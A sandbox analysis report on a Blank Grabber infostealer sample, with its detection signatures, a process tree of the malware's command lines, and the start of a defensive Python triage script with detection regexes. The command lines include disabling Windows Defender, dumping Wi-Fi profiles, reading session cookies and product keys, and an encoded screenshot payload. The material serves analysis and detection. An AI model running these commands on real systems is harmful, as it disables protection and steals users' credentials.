
Windows Analysis Report
program.exe

Overview

General Information

Sample name: program.exe
Analysis ID: 1557107
MD5: 3e6865657b29faea3a355c710f0aad45
SHA1: ad9b98fa0f96685abc17aaab7fe4d65ac8fe34f7
SHA256: 2c48f7bc874f1c812c0031519e756c28f940a58b2f64cdb40a08f1ccc798f671
Tags: exe, user-aachum

Detection

Blank Grabber
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the hosts file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification (diagram not reproduced)

Process Tree

  • System is w10x64
  • program.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\program.exe" MD5: 3E6865657B29FAEA3A355C710F0AAD45)
    • program.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\program.exe" MD5: 3E6865657B29FAEA3A355C710F0AAD45)
      • cmd.exe (PID: 7376 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7520 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7384 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7512 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 7956 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 7424 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7552 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7788 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7988 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7808 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7980 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7952 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8084 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8136 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1184 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8188 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 3180 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 2520 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 5472 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 1832 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 6768 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 5720 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8216 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 4076 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 8268 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 6592 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQBzAHUAbAB0AHMALgBBAGQAZAAoACgAQgBpAHQAbQBhAHAAKQBiAGkAdABtAGEAcAAuAEMAbABvAG4AZQAoACkAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAAgACgARQB4AGMAZQBwAHQAaQBvAG4AKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAvAC8AIABIAGEAbgBkAGwAZQAgAGEAbgB5ACAAZQB4AGMAZQBwAHQAaQBvAG4AcwAgAGgAZQByAGUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8260 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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 MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 8776 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 9144 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES93BE.tmp" "c:\Users\user\AppData\Local\Temp\tgmup5d5\CSC93ACBC84BC674220B3501D9F22ECFDE.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 7300 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 8252 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 8456 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8588 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8464 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 8596 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 8616 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8704 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8644 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 8752 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 8768 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8920 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8784 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 8956 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 8792 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 8964 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 9024 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 9080 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 9160 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7080 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8256 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8140 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7864 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 8568 cmdline: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 8636 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8280 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8664 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8728 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8436 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8972 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8880 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 9076 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8944 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7600 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8076 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7936 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
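Added triage example (not part of the Joe Sandbox report and not Blank Grabber's own code): a Python script that turns the behaviours visible in the process tree above into regex detections over process command lines, decodes `-EncodedCommand` payloads (base64 of UTF-16LE) and re-scans the decoded script, and groups the hits into rough kill-chain stages. The sample command lines are copied from the tree above; the encoded command is a constructed short stand-in for the report's long screenshot payload, which decodes to a PowerShell script that uses Add-Type to compile a C# `Screenshot` class calling `Graphics.CopyFromScreen` over `Screen.AllScreens` and saves each display as `Display (n).png`; that Add-Type compile is what spawns the csc.exe and cvtres.exe children. The tag names, stage groupings and verdict thresholds are this example's own conventions, not Sigma or Joe Sandbox identifiers.

```python
"""Triage of process command lines from a sandbox process tree.

Added example for this report; not Joe Sandbox or Blank Grabber code. Tag
names, stage groupings and the verdict scale are this example's own.
"""
import base64
import re

# Regex detections for the behaviours seen in the process tree above.
PATTERNS = {
    "defender-exclusion": re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I),
    "defender-disable": re.compile(
        r"Set-MpPreference\s.*-Disable\w+\s+\$true|MpCmdRun\.exe.*-RemoveDefinitions", re.I),
    "encoded-powershell": re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "execution-policy-bypass": re.compile(r"-ExecutionPolicy\s+(?:Bypass|Unrestricted)", re.I),
    "startup-folder-persistence": re.compile(r"\\Start Menu\\Programs\\StartUp\\", re.I),
    "wlan-profile-dump": re.compile(r"netsh\s+wlan\s+show\s+profile", re.I),
    "clipboard-capture": re.compile(r"Get-Clipboard", re.I),
    "password-protected-archive": re.compile(r"\brar(?:\.exe)?\s+a\b.*\s-hp", re.I),
    "av-product-discovery": re.compile(r"SecurityCenter2.*AntivirusProduct", re.I),
    "hosts-file-attrib-change": re.compile(r"attrib\s+[-+]r\s+.*drivers\\etc\\hosts", re.I),
    "registry-secret-read": re.compile(r"\.ROBLOSECURITY|BackupProductKeyDefault", re.I),
}

# Rough kill-chain grouping used for the verdict (this example's own mapping).
STAGES = {
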